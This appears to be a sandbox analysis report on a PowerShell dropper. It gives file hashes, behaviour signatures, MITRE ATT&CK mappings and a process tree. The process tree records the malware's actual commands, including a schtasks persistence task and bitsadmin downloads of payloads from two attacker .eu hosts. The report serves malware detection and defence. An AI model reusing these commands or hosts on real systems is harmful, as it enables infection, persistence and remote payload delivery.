27be11fa92a078991c195850e10e1acfac1bd78f860cb803fffe7c9622227983

General

Target

YQpjoXnBJr/WRQDouwL.ps1
Size

150KB
MD5

8c16f434c6368c0a59d01f82dfdae4c8
SHA1

9fb837536241866db25be8af035f47f24539bfd3
SHA256

f4faf31b67ed1262db67a8dee7014841e7197cce87e66a8faa270a97bc0e909d
SHA512

c86e56965559cacc2db25f5d0b86f99bc10fe91d1b698a63c183e4da700760ba8f7772612d036148cefa4e66459675b44e44fb95f8467a6c5af6b9f353c5b9c7
SSDEEP

3072:n0fsUhwCt/AO41upua+ZaGxMYb4QR3TjqjHnPg2pwQ5YV:n0fswwCto/1upua+ZaGCYb4QlT6HPTwT

Score

10^/10

dropper execution

Malware Config

Signatures

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

bitsadmin.exebitsadmin.exe

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3744	4192	bitsadmin.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3704	4192	bitsadmin.exe	87

Download via BitsAdmin 1 TTPs 2 IoCs

dropper

BITS Jobs

T1197

Processes:

bitsadmin.exebitsadmin.exe

pid	Process
3744	bitsadmin.exe
3704	bitsadmin.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

wscript.EXE

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	wscript.EXE

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exe

pid	Process
4736	powershell.exe
4848	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

schtasks.exe

pid	Process
4200	schtasks.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exe

pid	Process
4736	powershell.exe
4736	powershell.exe
4848	powershell.exe
4848	powershell.exe
4848	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	4736	powershell.exe
Token: SeDebugPrivilege	4848	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

Processes:

powershell.exewscript.EXEpowershell.exe

description	pid	Process	procid_target
PID 4736 wrote to memory of 1196	4736	powershell.exe	84
PID 4736 wrote to memory of 1196	4736	powershell.exe	84
PID 4736 wrote to memory of 4200	4736	powershell.exe	85
PID 4736 wrote to memory of 4200	4736	powershell.exe	85
PID 4212 wrote to memory of 4848	4212	wscript.EXE	105
PID 4212 wrote to memory of 4848	4212	wscript.EXE	105
PID 4848 wrote to memory of 1140	4848	powershell.exe	109
PID 4848 wrote to memory of 1140	4848	powershell.exe	109
PID 4848 wrote to memory of 4976	4848	powershell.exe	113
PID 4848 wrote to memory of 4976	4848	powershell.exe	113

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\YQpjoXnBJr\WRQDouwL.ps1
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4736
- C:\Windows\system32\schtasks.exe
  "C:\Windows\system32\schtasks.exe" /query /FO CSV /v
  2⤵
  PID:1196
- C:\Windows\system32\schtasks.exe
  "C:\Windows\system32\schtasks.exe" /F /create /sc minute /mo 4 /TN "S0BWLExdZPR" /ST 07:00 /TR "wscript /nologo /E:vbscript c:\users\Admin\AppData\Roaming\\BWLExdZPR\gLAKieFX.rock"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:4200

C:\Windows\system32\wscript.EXE
C:\Windows\system32\wscript.EXE /nologo /E:vbscript c:\users\Admin\AppData\Roaming\\BWLExdZPR\gLAKieFX.rock
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4212
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -file gLAKieFX.ps1
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4848
- - C:\Windows\system32\getmac.exe
    "C:\Windows\system32\getmac.exe" /fo table
    3⤵
    PID:1140
- - C:\Windows\system32\bitsadmin.exe
    "C:\Windows\system32\bitsadmin.exe" /reset
    3⤵
    PID:4976

C:\Windows\system32\bitsadmin.exe
bitsadmin /transfer pcjvhb /priority FOREGROUND "https://yjtyhm.eu/topic//9e494999ec81074bbd311e1a468f0011.html" C:\users\Admin\AppData\Roaming\BWLExdZPR\0_svchost.log
1⤵
- Process spawned unexpected child process
- Download via BitsAdmin
PID:3744

C:\Windows\system32\bitsadmin.exe
bitsadmin /transfer LeqoiR /priority FOREGROUND "https://nmhholiut.eu/topic//9e494999ec81074bbd311e1a468f0011.html" C:\users\Admin\AppData\Roaming\BWLExdZPR\1_svchost.log
1⤵
- Process spawned unexpected child process
- Download via BitsAdmin
PID:3704

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Persistence

BITS Jobs

1

T1197

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Privilege Escalation

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Defense Evasion

BITS Jobs

1

T1197

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b8a507ea87f4db23962b175b90889f86

SHA1
d7957c02ed987bbf866c98e4491a926b5453c58d

SHA256
291a53a8822be2c1b654a400ccd6fbbbf90712d4eb2078ccd2d10824d4de4e2b

SHA512
23c6774e1c2bb07e9eb814b60b040ebaea933bc664b9eebfa741495e89a8568ff86653b4efa58595fa94f7aff0216d132db96a871ca78600fea3e5c08b9d2bea

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xdnz5555.p10.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\users\Admin\AppData\Roaming\BWLExdZPR\gLAKieFX.ps1

Filesize
2KB

MD5
35e4afeee64620332a1e2dcf9e81d222

SHA1
384ee041dfdbae6505533cf6f6e7985f45dd7d2c

SHA256
932325ef978bbc5088ec975d8cb1f602ea6c72032b593a68b316c8734f4e7d3e

SHA512
80c4bff30095aaef4c16356d6f64e7b6bdfa09aba6479e068f37bfa1f69ff9773bf729bd1fa294fe648b6f641f6bf0dfeb2ad351b1d42b5c0ac14b5ca0ed4423

Download Submit
C:\users\Admin\AppData\Roaming\BWLExdZPR\main.sh

Filesize
196KB

MD5
d4f06b258da41c8260fe07e2bc280953

SHA1
046a98fa4b8e4b44914884c1525c2c787c98cfa4

SHA256
b89c2c4c38917239929a94d79f86076f61dde3029fb514fdc7944d7b0114a455

SHA512
3bc6231d0d5aebad5f3dc45ff6c9b9391ebab51ea004acadd4b9cea96fab91a2274a04d65ca76c431048303cb2405178fcfb989db7bbac95a10ccbf42c4ce660

Download Submit
C:\users\Admin\AppData\Roaming\BWLExdZPR\sleep.sh

Filesize
1KB

MD5
a42520d036314591d61ecb810833a0f4

SHA1
f45f63c60562aadd137fe5f23d37ec5d8a1c54da

SHA256
f2d2cc6bb0b77ef031d0508acb99b4c12b95ff3eff76d33aeb40b8c8695146ea

SHA512
35a13ed9c17b1659f9c53ce4f53048f3dcf6e790a1b74bdcf174d3a625ad9db2e04da491f74d735bfabec54c2c7981c73ac516fe5612995836c179f792e73a9b

Download Submit
\??\c:\users\Admin\AppData\Roaming\BWLExdZPR\gLAKieFX.rock

Filesize
930B

MD5
7fbce159c99e4880188e07f442a9c0fc

SHA1
ad59a464f1e5797c33050f9497dd02d8836ca250

SHA256
ab2702fb8976757a7514f7adb696e66007f5148cdab35a087167d641cf737c47

SHA512
ef26a1466e0eb9880e11aac52507484c43cfd11752e7f6a4d11762b9efcf495e193a9a0a165474b048fbd8dda87a789cd250b7ada42f9bee9ad4b0fa25de8033

Download Submit
memory/4736-0-0x00007FFB76543000-0x00007FFB76545000-memory.dmp

Filesize
8KB

Download
memory/4736-12-0x00007FFB76540000-0x00007FFB77001000-memory.dmp

Filesize
10.8MB

Download
memory/4736-13-0x00007FFB76540000-0x00007FFB77001000-memory.dmp

Filesize
10.8MB

Download
memory/4736-18-0x00007FFB76540000-0x00007FFB77001000-memory.dmp

Filesize
10.8MB

Download
memory/4736-21-0x00007FFB76540000-0x00007FFB77001000-memory.dmp

Filesize
10.8MB

Download
memory/4736-11-0x00007FFB76540000-0x00007FFB77001000-memory.dmp

Filesize
10.8MB

Download
memory/4736-10-0x00000233D6BA0000-0x00000233D6BC2000-memory.dmp

Filesize
136KB

Download
memory/4848-36-0x000002DA78F20000-0x000002DA79448000-memory.dmp

Filesize
5.2MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads